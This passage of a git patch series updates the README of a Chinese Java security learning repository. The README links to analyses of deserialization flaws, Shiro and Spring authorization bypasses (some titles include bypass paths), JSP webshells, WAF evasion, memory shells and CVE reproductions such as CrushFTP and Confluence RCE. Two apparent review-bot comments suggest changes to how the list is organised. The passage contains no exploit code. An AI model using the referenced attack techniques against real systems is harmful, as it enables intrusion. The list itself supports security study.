反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) From 244b858e9ee92f6717570aa8914d1a4cd05976ed Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 10 Jan 2024 10:28:59 +0800 Subject: [PATCH 43/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a6186c1..94bdbd0 100644 --- a/README.md +++ b/README.md 
@@ -403,7 +403,7 @@ - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - + - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) From 14492e007dbb5c057b5d303a51935ee2609ee7f8 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 10 Jan 2024 10:30:41 +0800 Subject: [PATCH 44/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞) --- README.md | 23 +---------------------- 1 file changed, 1 insertion(+), 22 deletions(-) diff --git a/README.md b/README.md index 94bdbd0..fd0f299 100644 --- a/README.md +++ b/README.md 
@@ -278,36 +278,23 @@ ## 11.Spring - [浅谈SpringWeb请求解析过程(很不错的文章把低版本一些绕过的特性基本都提到了)](https://forum.butian.net/share/2214) - [浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) - - [低版本SpringBoot-SpEL表达式注入漏洞复现分析](https://y4tacker.github.io/2022/02/07/year/2022/2/%E4%BD%8E%E7%89%88%E6%9C%ACSpringBoot-SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%88%86%E6%9E%90/) - - [SpringCloud-SnakeYAML-RCE(高版本不可用)](https://y4tacker.github.io/2022/02/08/year/2022/2/SpringCloud-SnakeYAML-RCE/) - - [Spring Boot Vulnerability Exploit Check List](https://github.com/LandGrey/SpringBootVulExploit) - - [SSRF to Rce with Jolokia and Mbeans](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/SSRF%20to%20RCE%20with%20Jolokia%20and%20MBeans%20%E2%80%A2%20Think%20Love%20Share.pdf) - - [CVE-2022-22947 SpringCloudGateWay 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/CVE-2022-22947%20SpringCloudGateWay%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/index.md) - - [Spring Cloud Function-SPEL(利用面不大)](https://hosch3n.github.io/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) - - [SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析](http://rui0.cn/archives/1158) - - [Spring Beans RCE分析(CVE-2022-22965)(我还是喜欢叫Spring4shell,自己懒得写了,这篇还可以,稍微注意下AccessLogValve这个类WBS)](https://xz.aliyun.com/t/11129) - - [Spring Data MongoDB SpEL表达式注入(CVE-2022-22980)(能看但是有些逻辑还是讲得很混乱总体而已还是好的作为参考即可)](https://xz.aliyun.com/t/11484) - - [SpringBoot全局注册Filter过滤XSS](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/SpringBoot%E5%85%A8%E5%B1%80%E6%B3%A8%E5%86%8CFilter%E8%BF%87%E6%BB%A4XSS/index.md) - - [Springboot devtools反序列化(难点在于secret的获取,当然比如有actuator端点暴露情况下就会变得容易)](https://novysodope.github.io/2022/05/11/77/) - 
[浅谈Spring中的Controller参数的验证机制(注意Hibernate Validator的正确配置)](https://forum.butian.net/share/2538) ## 12.Shiro - [Shiro RememberMe 漏洞检测的探索之路(长亭的一些总结非常不错)](https://stack.chaitin.com/techblog/detail?id=39) - - [Shiro另类检测方式](http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/) - [浅谈Shiro执行任意反序列化gadget的方案](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/%E6%B5%85%E8%B0%88Shiro%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96gadget%E7%9A%84%E6%96%B9%E6%A1%88/index.md) - [CVE-2010-3863权限绕过(通过/./admin绕过/admin,/abc/../admin)](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/CVE-2010-3863%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87/index.md) @@ -321,7 +308,7 @@ - [CVE-2020-13933特殊场景权限绕过(通过/unauthorize/%3b)](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/CVE-2020-13933%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87/index.md) - [SpringBoot2.3.0下Shiro<=1.5.1权限绕过(通过/aa;/%2e%2e/unauthorize绕过对/unauthorize拦截,当然也可以不用目录穿越/;y4tacker/unauthorize也可以)](https://github.com/Y4tacker/JavaSec/tree/main/11.Spring/SpringBoot2.3.0%E4%B8%8BShiro%3C%3D1.5.1%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87) - [Spring-Shiro1.5.2 Bypass(通过/unauthorize/a%252Fa绕过对/unauthorize/*的权限限制)](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/Spring-Shiro1.5.2%20Bypass/index.md) -- [记一次 Shiro 的实战利用(突破限制shiro 550利用payload的长度,这种方式不能很好对抗检测文件落地,其实也可以配合上下文一些无害属性多次set写入加载)](https://mp.weixin.qq.com/s/w9sMhMrCy1pofOV-h94qbQ) +- [记一次 Shiro 的实战利用(突破限制shiro 550利用payload的长度,这种方式不能很好对抗检测文件落地,其实也可以配合上下文一些无害属性多次set写入加载)](https://mp.weixin.qq.com/s/w9sMhMrCy1pofOV-h94qbQ) @@ -335,7 +322,6 @@ - [半自动化挖掘request实现多种中间件回显](https://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/) - ## 14. JSPWebshell - [JSP-Webshells集合(三梦的总结挺全面的利用点)](https://github.com/threedr3am/JSP-Webshells) 
@@ -344,11 +330,9 @@ - [JspWebshell编码混淆篇(unicode和html实体编码那些就懒得写了技术性不强)](https://y4tacker.github.io/2022/11/27/year/2022/11/%E6%B5%85%E8%B0%88JspWebshell%E4%B9%8B%E7%BC%96%E7%A0%81/) - ## 15.Waf - [Java文件上传大杀器-绕waf(针对commons-fileupload组件)](https://y4tacker.github.io/2022/02/25/year/2022/2/Java%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%A4%A7%E6%9D%80%E5%99%A8-%E7%BB%95waf(%E9%92%88%E5%AF%B9commons-fileupload%E7%BB%84%E4%BB%B6)/) - - [探寻Java文件上传流量层面waf绕过姿势系列一](https://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/) - [探寻Java文件上传流量层面waf绕过姿势系列二](https://y4tacker.github.io/2022/06/21/year/2022/6/%E6%8E%A2%E5%AF%BBJava%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2waf%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF%E7%B3%BB%E5%88%97%E4%BA%8C/) - [Java反序列化数据绕WAF之加大量脏数据 | 回忆飘如雪 (gv7.me)](https://gv7.me/articles/2021/java-deserialize-data-bypass-waf-by-adding-a-lot-of-dirty-data/) @@ -357,11 +341,9 @@ - [RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) - ## 16.漏洞复现 - Apache - - [Apache Commons Configuration 远程代码执行(虽然是配置文件RCE但也有学习意义)](https://xz.aliyun.com/t/11527) - [Apache Spark shell command injection vulnerability via Spark UI(之前很早前在我的各个知识星球分享了)](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-33891/index.md) - [Apache Commons JXPath 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-41852/index.md) 
@@ -384,16 +366,13 @@ - Spring - [Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) - Nacos - - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) - [Nacos 多次打非完美方案(这人也没完全考虑到容错,但是网上暂时只有这人的,实际上在构建WriteRequest缺少setOperation)(慎用!别把别人打崩了!)](https://github.com/c0olw/NacosRce) - - Adobe - [CVE-2023-29298: Adobe ColdFusion Access Control Bypass](https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/) - [Analysis CVE-2023-29300: Adobe ColdFusion Pre-Auth RCE](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - Smartbi - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) - - Others - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) From 49c22b0ce9e356b90f6916b01b5c8f0d3d99c932 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 22 Jan 2024 17:35:54 +0800 Subject: [PATCH 45/72] Update README.md Atlassian Confluence-Remote Code Execution(CVE-2023-22527) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fd0f299..784b9f5 100644 --- a/README.md +++ b/README.md 
@@ -383,7 +383,7 @@ - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - + - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) ## 17.模板引擎+表达式相关 From 9c248bdb99bc303813c550d05b42654bb2b6ae05 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 29 Jan 2024 10:26:49 +0800 Subject: [PATCH 46/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Jenkins文件读取漏洞拾遗(CVE-2024-23897) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 784b9f5..885302d 100644 --- a/README.md +++ b/README.md @@ -384,6 +384,7 @@ - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) + - [Jenkins文件读取漏洞拾遗(CVE-2024-23897)](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html) ## 17.模板引擎+表达式相关 From e3286edb907fc22b95e7c98221f26bc66946de0c Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 26 Feb 2024 16:48:25 +0800 Subject: [PATCH 47/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit UTF-8 Overlong Encoding导致的安全问题 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 885302d..5d50e0a 100644 --- a/README.md +++ b/README.md @@ -76,6 +76,7 @@ - [JDK7u21](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/JDK7u21/index.md) - [AspectJWeaver写文件](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/AspectJWeaver/AspectJWeaver.md) - [反序列化在渗透测试当中值得关注的点](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BD%93%E4%B8%AD%E5%80%BC%E5%BE%97%E5%85%B3%E6%B3%A8%E7%9A%84%E7%82%B9/index.md) +- [UTF-8 Overlong Encoding导致的安全问题(在绕过流量设备上非常有帮助)](https://mp.weixin.qq.com/s/fcuKNfLXiFxWrIYQPq7OCg) - [构造java探测class反序列化gadget](https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA) - [对URLDNS探测class的补充(为什么本地明明没有这个类却有"DNS解析")](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/URLDNS%E6%8E%A2%E6%B5%8Bclass%E7%9A%84%E8%A1%A5%E5%85%85/index.md) - [利用Swing构造反序列化SSRF/RCE(JDK CVE-2023-21939)](https://github.com/Y4Sec-Team/CVE-2023-21939) From 53657f19e2f9426026c0ccf07ce127a708d0d635 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Mar 2024 16:16:47 +0800 Subject: [PATCH 48/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5d50e0a..e45eb19 100644 --- a/README.md +++ b/README.md 
@@ -39,6 +39,7 @@ - [JEP290基础概念](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/JEP290%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/index.md) - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) + - [绕过WAF保护的XXE(一些通用的流量混淆方式)](https://xz.aliyun.com/t/4059?accounttraceid=04ba92e87b2342b9a14daca5812cc52aoxob&time__1311=n4mx0DnDBiitiQo4GNulxU2nD9iBDc70ZAnYD) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) - [低版本下Java文件系统00截断](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E4%BD%8E%E7%89%88%E6%9C%AC%E4%B8%8BJava%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F00%E6%88%AA%E6%96%AD/index.md) - [有趣的XSS之Normalize](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E6%9C%89%E8%B6%A3%E7%9A%84XSS%E4%B9%8BNormalize/index.md) From fa08334b04ce09b19397e87b70134d2df6514eba Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 24 Mar 2024 20:31:20 +0800 Subject: [PATCH 49/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index e45eb19..b33d7cf 100644 --- a/README.md +++ b/README.md @@ -435,6 +435,7 @@ ## 20.议题 - [Hacking FernFlower](https://y4tacker.github.io/2023/12/22/year/2023/12/Hacking-FernFlower/) + - [议题相关代码](https://github.com/Y4tacker/HackingFernFlower) From a99fcfe38e114bedcccdb36d43e0ce6883722559 Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 26 Mar 2024 09:51:45 +0800 Subject: [PATCH 50/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新帆软channel接口反序列化漏洞分析(二次反序列化一些实战场景利用) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index b33d7cf..b812beb 100644 --- a/README.md +++ b/README.md @@ -461,6 +461,7 @@ - [Java Web —— 从内存中Dump JDBC数据库明文密码(还挺好玩的)](https://mp.weixin.qq.com/s/QCfqO2BJuhSOr58rldZzxA) - [如何带依赖打包Jar](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Maven/index.md) - [一些Java二次反序列化的点(持续收集)](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Java%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Java%E8%A7%A6%E5%8F%91%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E7%82%B9.md) + - [帆软channel接口反序列化漏洞分析(二次反序列化一些实战场景利用)](https://forum.butian.net/share/2806) - [自己写的OpenRasp分析](https://y4tacker.github.io/2022/05/28/year/2022/5/OpenRasp%E5%88%86%E6%9E%90/) - [Apache Unomi 表达式注入攻防](https://github.com/1135/unomi_exploit) - [JEXL3表达式注入](https://xz.aliyun.com/t/8099) From 8c84ea3ac77190fd83d4de5b954e63679243a023 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 1 Apr 2024 18:39:07 +0800 Subject: [PATCH 51/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新“Java安全攻防之Spring Cloud Gateway攻击Redis” --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index b812beb..13b1ed7 100644 --- a/README.md +++ b/README.md @@ -189,6 +189,7 @@ - [看不见的 Jsp-WebShell 第二式增强之无痕](https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA) - [Spring cloud gateway通过SPEL注入内存马](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/) + - [Java安全攻防之Spring Cloud Gateway攻击Redis](https://mp.weixin.qq.com/s/6U1KaLrrtq2dxg55IYASFg) - Tools 
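Review bot: the entry added in the last hunk here (Java安全攻防之Spring Cloud Gateway攻击Redis) lands in a list whose surrounding context lines are about JSP webshells and memory-shell injection, while its title is about attacking Redis through Spring Cloud Gateway. If it is meant as a follow-up to the "Spring cloud gateway通过SPEL注入内存马" entry directly above it, add a short parenthetical saying so, as other entries in this README do; otherwise move it to the section that covers Spring or post-exploitation so readers searching by topic can find it.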
From 35c6418f32ac5224ae5f6ab8c9ad45150752f4af Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 9 May 2024 13:58:55 +0800 Subject: [PATCH 52/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新整理CrushFTP漏洞 --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13b1ed7..913949f 100644 --- a/README.md +++ b/README.md @@ -375,7 +375,12 @@ - [CVE-2023-29298: Adobe ColdFusion Access Control Bypass](https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/) - [Analysis CVE-2023-29300: Adobe ColdFusion Pre-Auth RCE](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - Smartbi - - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) + - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) +- CrushFTP + - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) + - [浅析CrushFTP之VFS逃逸](https://y4tacker.github.io/2024/04/23/year/2024/4/%E6%B5%85%E6%9E%90CrushFTP%E4%B9%8BVFS%E9%80%83%E9%80%B8/) + - [CrushFTP Unauthenticated Remote Code Execution(CVE-2024-4040)](https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis) + - [CrushFTP后利用提权分析(CVE-2024-4040)](https://y4tacker.github.io/2024/04/25/year/2024/4/CrushFTP%E5%90%8E%E5%88%A9%E7%94%A8%E6%8F%90%E6%9D%83%E5%88%86%E6%9E%90-CVE-2024-4040/) - Others - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) 
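Review bot: the Smartbi line in this hunk is removed and re-added with the same visible title and URL, so the only difference is whitespace, while the commit message mentions only the CrushFTP reorganisation. Drop that line pair from the commit or note the indentation fix in the message, so that the diff shows only the new CrushFTP group. In that group, the "浅析CrushFTP之VFS逃逸" entry sits between the CVE-2023-43177 and CVE-2024-4040 entries without an identifier of its own; a short parenthetical stating which issue it analyses would keep the group consistent.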
@@ -384,7 +389,6 @@ - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) - [Jenkins文件读取漏洞拾遗(CVE-2024-23897)](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html) From 59e20640ddb7601b10255aec5819e95093c6a9d2 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 20 May 2024 10:50:10 +0800 Subject: [PATCH 53/72] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 913949f..f2f7e2f 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,9 @@

2021年10月18日,梦的开始


+知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +![Bug Hunter](https://github.com/Y4tacker/JavaSec/assets/56486273/08eab771-b1cd-4d97-a3a9-173b78fdc997) + ## 1.基础篇 From 79a23affff66e5d7454d8acd2814e8a0201d942e Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 20 May 2024 10:50:28 +0800 Subject: [PATCH 54/72] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index f2f7e2f..ad2fd38 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,8 @@

2021年10月18日,梦的开始


-知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) + ![Bug Hunter](https://github.com/Y4tacker/JavaSec/assets/56486273/08eab771-b1cd-4d97-a3a9-173b78fdc997) From bcbb4525172a2a33ee30772edd90d3b710d51978 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 20 May 2024 10:51:40 +0800 Subject: [PATCH 55/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ad2fd38..a430c9b 100644 --- a/README.md +++ b/README.md @@ -17,7 +17,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) -![Bug Hunter](https://github.com/Y4tacker/JavaSec/assets/56486273/08eab771-b1cd-4d97-a3a9-173b78fdc997) + ## 1.基础篇 From 4373be9973ab79f246dcaf25509a83c979707d59 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:48:40 +0800 Subject: [PATCH 56/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index a430c9b..9d1499c 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@
知识星球试运营,后面主要会发一些应急漏洞的分析(前提我会😜) +Ps:想不想进随意,大部分漏洞我都会发在博客当中,少部分自己觉得不那么有意思的漏洞可能只会发在星球中 From afe3fc98188292748208d719e4b31e50435adfe6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 23 May 2024 15:49:37 +0800 Subject: [PATCH 57/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 9d1499c..02116fe 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@
